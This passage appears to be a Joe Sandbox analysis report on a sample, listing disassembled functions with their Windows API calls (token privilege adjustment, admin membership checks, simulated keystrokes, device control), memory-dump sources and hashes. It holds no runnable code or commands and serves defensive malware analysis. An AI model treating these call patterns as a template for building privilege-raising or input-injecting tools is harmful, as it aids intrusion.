                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E1B180
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
                                                                                                                  • GetLastError.KERNEL32 ref: 00E1B1BA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1922334811-0
                                                                                                                  • Opcode ID: 9168ab246ec4bc91cd672cc719559605f9d27099b6016895f5d633a67a1e6ada
                                                                                                                  • Instruction ID: 67ea3ef4cefe14200326787b3c8f726663fcb5691479cdaa7a1947d74050e200
                                                                                                                  • Opcode Fuzzy Hash: 9168ab246ec4bc91cd672cc719559605f9d27099b6016895f5d633a67a1e6ada
                                                                                                                  • Instruction Fuzzy Hash: D811BFB1A04205BFE7189F64EC85D6BB7ADEF44310B21852EE456A3240DB70FC418A70
                                                                                                                  Function 00E26685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E266AF
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00E266EC
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E266F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 33631002-0
                                                                                                                  • Opcode ID: 825231f4447095e387382334e9c9154e2f68cc3fcb12761dd17e647b63bf48d7
                                                                                                                  • Instruction ID: efaa7a7470b757e657033ca061c0da194a712fb0ddf025769a7d2ea3ff2d1d88
                                                                                                                  • Opcode Fuzzy Hash: 825231f4447095e387382334e9c9154e2f68cc3fcb12761dd17e647b63bf48d7
                                                                                                                  • Instruction Fuzzy Hash: A111A5B1E01228BFE7108BA8EC45FAF77BCEB09758F004656F901F7190C2B4AE0487A1
                                                                                                                  Function 00E271FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E27223
                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E2723A
                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00E2724A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3429775523-0
                                                                                                                  • Opcode ID: aebb33646604e4f83b7bc9858aabf0a25f55c24854073d42789316d3b3e9c977
                                                                                                                  • Instruction ID: 3c73c0af3b9056e17259614c14f0958b8084856e4f4c654f267e73a8ec42f6ed
                                                                                                                  • Opcode Fuzzy Hash: aebb33646604e4f83b7bc9858aabf0a25f55c24854073d42789316d3b3e9c977
                                                                                                                  • Instruction Fuzzy Hash: 1BF01D76E14209FFDF04DFE5DD99AEEBBB9EF08205F504469E602E2191E2709A449B10
                                                                                                                  Function 00DFB385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • GetParent.USER32(?), ref: 00E5E5B2
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00DFB1E8,?,?,?,00000006,?), ref: 00E5E62C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314495775-0
                                                                                                                  • Opcode ID: 2f22d0c0105f3a6342eec088c765aff7bee14f49724f0f8c6dee02edc46cc55f
                                                                                                                  • Instruction ID: 3b8ff1f882828bc7e6734cb7fb3584c7319d52f1ae751d7748640f1d7a2222c2
                                                                                                                  • Opcode Fuzzy Hash: 2f22d0c0105f3a6342eec088c765aff7bee14f49724f0f8c6dee02edc46cc55f
                                                                                                                  • Instruction Fuzzy Hash: 5621A734600118AFCB148F28DC859BD3B95EB4A378F1D8293FA156B3E1D7309E05D721
                                                                                                                  Function 00E2F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E2F599
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E2F5C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2295610775-0
                                                                                                                  • Opcode ID: 03658860c5d080f0b51b41a8c48861f947bfb8c29a2b2f85fd36374cfb75df92
                                                                                                                  • Instruction ID: 81a28fdbc64ede131d55aba6bed7b9ff2b9eaa48dc186bc3bfede0eba1488607
                                                                                                                  • Opcode Fuzzy Hash: 03658860c5d080f0b51b41a8c48861f947bfb8c29a2b2f85fd36374cfb75df92
                                                                                                                  • Instruction Fuzzy Hash: E011C4316046049FD710EF29D845A3EF3E8FF85324F05892EF9A5D7291CB70AD048B91
                                                                                                                  Function 00E4F2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00E5E44F,?,?,?), ref: 00E4F344
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E4F32A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1273190321-0
                                                                                                                  • Opcode ID: 149a3717e7a59427e72e58ac475b452c03ffd5c3299b71e687e3a8b37cb447d4
                                                                                                                  • Instruction ID: 278d6d3756b2aa670f437b01dac16212ba45f35e2ea89da0905afdecbc85570c
                                                                                                                  • Opcode Fuzzy Hash: 149a3717e7a59427e72e58ac475b452c03ffd5c3299b71e687e3a8b37cb447d4
                                                                                                                  • Instruction Fuzzy Hash: 93012430204214EFCF219F15EC44FBA3BA6FB8A764F184164F9062B2E0C771AC06DB61
                                                                                                                  Function 00E4F689 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4F6AC
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00E5E52B,?,?,?,?,?), ref: 00E4F6D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3420055661-0
                                                                                                                  • Opcode ID: 4c29ff9445b8e2222d3a5d0c0316aeb499cca9948593a5ac76987e4cd058b33e
                                                                                                                  • Instruction ID: ae9d9721983bc3ecc8ac8c547af105dbd22e42c5097cd4bca99034f416ad0c91
                                                                                                                  • Opcode Fuzzy Hash: 4c29ff9445b8e2222d3a5d0c0316aeb499cca9948593a5ac76987e4cd058b33e
                                                                                                                  • Instruction Fuzzy Hash: C9F03A72900118FFEF048F86EC099AE7FB9EF48351F14405AF902A2160D7B1AA55EBA0
                                                                                                                  Function 00E2CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E3BE6A,?,?,00000000,?), ref: 00E2CEA7
                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E3BE6A,?,?,00000000,?), ref: 00E2CEB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479602957-0
                                                                                                                  • Opcode ID: 8171959cdb072814e401b4a781b6bfbb686f3345f843c53e331ffc0760398102
                                                                                                                  • Instruction ID: 195f143ae0f60e99161614edb7de8959a30d5f0c33e49475b0a7548a53d6bd05
                                                                                                                  • Opcode Fuzzy Hash: 8171959cdb072814e401b4a781b6bfbb686f3345f843c53e331ffc0760398102
                                                                                                                  • Instruction Fuzzy Hash: EBF08231504229EBDB20ABA5EC49FFA776DFF083A1F008166F919E6191D6709A54CBB0
                                                                                                                  Function 00E2411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E24153
                                                                                                                  • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E24166
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3536248340-0
                                                                                                                  • Opcode ID: 4a5ed800b93dde87a9bc4df475f5454e8fd269f42dfeb8021776297f4dc5fb32
                                                                                                                  • Instruction ID: 3f9f6b4a48693477071bee079e5bd74b58194a6ccc3d56048ec19efb6eeb5556
                                                                                                                  • Opcode Fuzzy Hash: 4a5ed800b93dde87a9bc4df475f5454e8fd269f42dfeb8021776297f4dc5fb32
                                                                                                                  • Instruction Fuzzy Hash: EBF067B090424DAFDB058FA1DC05BBE7BB0EF04309F00800AF966A6192D7B986169FA4
                                                                                                                  Function 00E1AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E1ACC0), ref: 00E1AB99
                                                                                                                  • CloseHandle.KERNEL32(?,?,00E1ACC0), ref: 00E1ABAB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 81990902-0
                                                                                                                  • Opcode ID: 6be75cc8de847eb51d8392d6e38f2bb4b54f20887fae1bce0f726c3e76b810f2
                                                                                                                  • Instruction ID: 9a9d2e2576417bf9c1735d22f489cbb6f5fc63444e0adb4b29025244ad024b67
                                                                                                                  • Opcode Fuzzy Hash: 6be75cc8de847eb51d8392d6e38f2bb4b54f20887fae1bce0f726c3e76b810f2
                                                                                                                  • Instruction Fuzzy Hash: 5AE08631004510AFE7212F15FC08D7377E9EF00320715C429F55980430C7629C90DB60
                                                                                                                  Function 00E4F7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00E4F7CB
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00E5E4AA,?,?,?,?), ref: 00E4F7F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 365f106302a095c3b887cec392147b1e296ad44a2632fff755fe8384de54a95e
                                                                                                                  • Instruction ID: 59c34d8ea4b577108b673001fea9c2d5150278b0058b5be85c7ce63c7069af1d
                                                                                                                  • Opcode Fuzzy Hash: 365f106302a095c3b887cec392147b1e296ad44a2632fff755fe8384de54a95e
                                                                                                                  • Instruction Fuzzy Hash: A7E0CD30204214FFEB150F09EC1EFBE3B18E704B90F508116F957A84E0D7F49490D260
                                                                                                                  Function 00E081AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00E06DB3,-0000031A,?,?,00000001), ref: 00E081B1
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E081BA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 447f0f66a1f3f99aac30f862bfa6ba8a8ac72d9844678cfd54d6299f1a5978eb
                                                                                                                  • Instruction ID: edc0c14680ff64addfae492aed3f794e000464af661c59abd1d289fcfbfb0997
                                                                                                                  • Opcode Fuzzy Hash: 447f0f66a1f3f99aac30f862bfa6ba8a8ac72d9844678cfd54d6299f1a5978eb
                                                                                                                  • Instruction Fuzzy Hash: 74B09231688608AFDB002BA3FC09B5A7F68EB086A2F804010F60D542618BB254248A96
                                                                                                                  Function 00E0D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 70d22d615b038513172744fdc062c47a037580add42aa3dd53b01aa274ccb434
                                                                                                                  • Instruction ID: f3227aed345607a7ee8101f1dd1d05142fb3b1ac50776cfc72fa36de96016fc6
                                                                                                                  • Opcode Fuzzy Hash: 70d22d615b038513172744fdc062c47a037580add42aa3dd53b01aa274ccb434
                                                                                                                  • Instruction Fuzzy Hash: 21323521D28F014DD7279635DD22336A288EFB73D5F15E737E819B5AAAEB29C4C34200
                                                                                                                  Function 00DE96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
